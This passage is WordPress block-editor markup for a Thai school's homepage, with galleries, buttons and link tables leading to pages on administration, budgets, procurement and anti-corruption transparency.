\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-scaled.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-scaled.png\",\"width\":2560,\"height\":1280}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 